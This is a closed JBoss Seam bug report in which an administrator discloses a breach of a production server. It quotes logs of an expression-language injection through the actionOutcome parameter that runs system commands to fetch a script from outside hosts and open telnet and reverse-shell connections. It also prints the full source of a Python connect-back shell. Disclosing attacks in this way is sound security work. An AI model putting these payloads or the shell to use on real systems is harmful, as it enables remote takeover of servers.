Uploaded image for project: 'Seam 2'
  1. Seam 2
  2. JBSEAM-4994

JBoss Seam remote execution vulnerability

    Details

    • Type: Bug
    • Status: Closed (View Workflow)
    • Priority: Major
    • Resolution: Duplicate Issue
    • Affects Version/s: 2.1.2.GA
    • Fix Version/s: None
    • Component/s: Security
    • Labels:
      None

      Description

      Recently discovered an exploit on our production server which appears to have allowed someone remote access to the user account set up for jboss.

      I have not found anything to show this has been reported previously. I have not yet reproduced and am working on fully understanding the exploit.

      == server.log ==
      2012-05-22 13:53:10,198 36426506 INFO [STDOUT] (ajp-0.0.0.0-8009-15 13:53:10,198 INFO [PathLogger] anonymous_user just landed on /*********/***/home.xhtml,pid=null, cid=1837 longrunning=true,nested=false, ipAddress115.238.137.24
      2012-05-22 13:53:16,595 36432903 INFO [STDOUT] (ajp-0.0.0.0-8009-15 13:53:16,595 INFO [PathLogger] anonymous_user just landed on /*********/***/home.xhtml,pid=null, cid=1837 longrunning=true,nested=false, ipAddress115.238.137.24

      == httpd.log with pertinent sections grouped ==
      /*
      115.238.137.24 - - [22/May/2012:13:53:17 -0700] "GET /a4j/s/3_3_1.GAorg/richfaces/renderkit/html/css/basic_classes.xcss/DATB/eAF7sqpgb-jyGdIAFrMEaw__;jsessionid=F08596F88DBB2D34013012462EB468AC HTTP/1.1" 200 6677
      115.238.137.24 - - [22/May/2012:13:53:17 -0700] "GET /a4j/s/3_3_1.GAcss/panel.xcss/DATB/eAF7sqpgb-jyGdIAFrMEaw__;jsessionid=F08596F88DBB2D34013012462EB468AC HTTP/1.1" 200 561
      115.238.137.24 - - [22/May/2012:13:53:17 -0700] "GET /a4j/g/3_3_1.GAorg/richfaces/renderkit/html/scripts/skinning.js HTTP/1.1" 200 1224
      115.238.137.24 - - [22/May/2012:13:53:18 -0700] "GET /extranet/css/blueprint/screen.css HTTP/1.1" 200 4150
      115.238.137.24 - - [22/May/2012:13:53:18 -0700] "GET /extranet/css/extranet.css HTTP/1.1" 200 10799
      115.238.137.24 - - [22/May/2012:13:53:18 -0700] "GET /extranet/js/site.js HTTP/1.1" 200 539
      115.238.137.24 - - [22/May/2012:13:53:17 -0700] "GET /a4j/g/3_3_1.GAorg.ajax4jsf.javascript.AjaxScript HTTP/1.1" 200 67842
      */

      115.238.137.24 - - [22/May/2012:13:52:54 -0700] "GET /*********/***/home.seam HTTP/1.1" 200 172555
      115.238.137.24 - - [22/May/2012:13:53:20 -0700] "GET /*********/***/home.seam?actionOutcome=/pwn.xhtml?pwned%3d%23

      {expressions.getClass().forName('java.lang.Runtime').getDeclaredMethods()[13].invoke(expressions.getClass().forName('java.lang.Runtime').getDeclaredMethods()[6].invoke(null),%20'telnet%20221.122.113.133%2028')}

      HTTP/1.1" 302 -
      115.238.137.24 - - [22/May/2012:13:53:21 -0700] "GET /pwn.seam?pwned=java.lang.UNIXProcess%4033c82634&cid=1838 HTTP/1.1" 404 979

      /*
      115.238.137.24 - - [22/May/2012:13:53:21 -0700] "GET /favicon.ico HTTP/1.1" 404 988
      */

      115.238.137.24 - - [22/May/2012:13:53:37 -0700] "GET /home.seam?actionOutcome=/pwn.xhtml?pwned%3d%23

      {expressions.getClass().forName('java.lang.Runtime').getDeclaredMethods()[13].invoke(expressions.getClass().forName('java.lang.Runtime').getDeclaredMethods()[6].invoke(null),%20'wget%20-O%20/tmp/back.py%20220.112.40.101/back.py')}

      null),%20'telnet%20221.122.113.133%2028')} HTTP/1.1" 302 -
      115.238.137.24 - - [22/May/2012:13:53:38 -0700] "GET /pwn.seam?pwned=java.lang.UNIXProcess%4051bc9d5bnull%29%2C+%27telnet+221.122.113.133+28%27%29%7D&cid=1841 HTTP/1.1" 404 979

      /*
      115.238.137.24 - - [22/May/2012:13:53:39 -0700] "GET /favicon.ico HTTP/1.1" 404 988
      */

      115.238.137.24 - - [22/May/2012:13:53:43 -0700] "GET /home.seam?actionOutcome=/pwn.xhtml?pwned%3d%23

      {expressions.getClass().forName('java.lang.Runtime').getDeclaredMethods()[13].invoke(expressions.getClass().forName('java.lang.Runtime').getDeclaredMethods()[6].invoke(null),%20'python%20/tmp/back.py%20221.122.113.133%2028')}

      HTTP/1.1" 302 -
      115.238.137.24 - - [22/May/2012:13:53:44 -0700] "GET /pwn.seam?pwned=java.lang.UNIXProcess%407724369d&cid=1844 HTTP/1.1" 404 979

      /*
      115.238.137.24 - - [22/May/2012:13:53:45 -0700] "GET /favicon.ico HTTP/1.1" 404 988
      */

      Discovered the following information on some searches

      == http://erro.sinaapp.com/?p=47 ==

      http://ip.com/welcome.seam?pwned=java.lang.UNIXProcess%4011b30c7&cid=73478

      http://ip.com/home.seam?actionOutcome=/webcome.xhtml%3fpwned%3d%23

      {expressions.getClass().forName(‘java.lang.Runtime’).getDeclaredMethods()[6]}

      http://ip.com/home.seam?actionOutcome=/welcome.xhtml%3fpwned%3d%23

      {expressions.getClass().forName(‘java.lang.Runtime’)}

      .getDeclaredMethods()[13]}

      http://ip.com/home.seam?actionOutcome=/welcome.xhtml%3fpwned%3d%23

      {expressions.getClass().forName(‘java.lang.Runtime’).getDeclaredMethods()[13].invoke(expressions.getClass().forName(‘java.lang.Runtime’).getDeclaredMethods()[6].invoke(null), ‘wget http://www.bitpress.com.cn/uploads/back.py -O /tmp/back.py’)}

      http://ip.com/home.seam?actionOutcome=/welcome.xhtml%3fpwned%3d%23

      {expressions.getClass().forName(‘java.lang.Runtime’).getDeclaredMethods()[13].invoke(expressions.getClass().forName(‘java.lang.Runtime’).getDeclaredMethods()[6].invoke(null), ‘perl /tmp/back.py 118.122.176.42 53′)}

      == back.py ==
      #!/usr/bin/python

      import sys

      import os

      import socket

      import pty

      shell = "/bin/sh"

      def usage(programname):

      print "Python connect-back door"

      print "Usage: %s <conn_back_ip> <port>" % programname

      def main():

      if len(sys.argv) !=3:

      usage(sys.argv[0])

      sys.exit(1)

      s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)

      try:

      s.connect((socket.gethostbyname(sys.argv[1]),int(sys.argv[2])))

      print "[+]Connect OK."

      except:

      print "[-]Can't connect"

      sys.exit(2)

      os.dup2(s.fileno(),0)

      os.dup2(s.fileno(),1)

      os.dup2(s.fileno(),2)

      global shell

      os.unsetenv("HISTFILE")

      os.unsetenv("HISTFILESIZE")

      pty.spawn(shell)

      s.close()

      if _name_ == "_main_":

      main()

        Gliffy Diagrams

          Attachments

            Issue Links

              Activity

                People

                • Assignee:
                  Unassigned
                  Reporter:
                  kevineliuk Kevin Eliuk
                • Votes:
                  0 Vote for this issue
                  Watchers:
                  2 Start watching this issue

                  Dates

                  • Created:
                    Updated:
                    Resolved: